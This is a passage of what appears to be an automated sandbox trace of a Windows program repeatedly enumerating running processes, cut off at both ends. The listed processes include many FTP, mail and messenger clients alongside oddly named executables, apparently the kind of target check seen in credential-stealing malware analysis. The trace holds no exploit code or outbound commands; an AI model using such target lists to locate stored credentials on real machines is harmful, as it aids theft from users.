lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0175.867] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0175.869] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0175.871] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0175.874] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0175.876] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0175.878] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0175.880] CloseHandle (hObject=0x1eb8) returned 1 [0175.880] Sleep (dwMilliseconds=0x64) [0176.001] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3a4 [0176.014] Process32First (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.016] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0176.017] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0176.019] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0176.023] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0176.025] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0176.028] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0176.030] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0176.033] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0176.035] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.077] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.080] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0176.082] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.084] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.086] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.088] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.090] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.093] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.095] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.097] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0176.099] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0176.102] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0176.104] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0176.106] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.108] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0176.110] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0176.112] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0176.180] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0176.183] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0176.185] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0176.187] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.189] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0176.191] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0176.192] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0176.217] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0176.219] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.221] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0176.223] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0176.225] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0176.227] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0176.231] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0176.234] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0176.236] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0176.239] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0176.294] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0176.296] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0176.298] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0176.301] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0176.303] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0176.306] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0176.309] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0176.311] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0176.314] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0176.316] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0176.319] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0176.321] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0176.324] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0176.326] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0176.334] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0176.339] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0176.342] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0176.344] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0176.347] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0176.350] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0176.352] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0176.356] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0176.358] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0176.361] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0176.364] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0176.366] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0176.370] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0176.376] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0176.379] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0176.382] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0176.386] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0176.388] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0176.391] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0176.395] Process32Next (in: 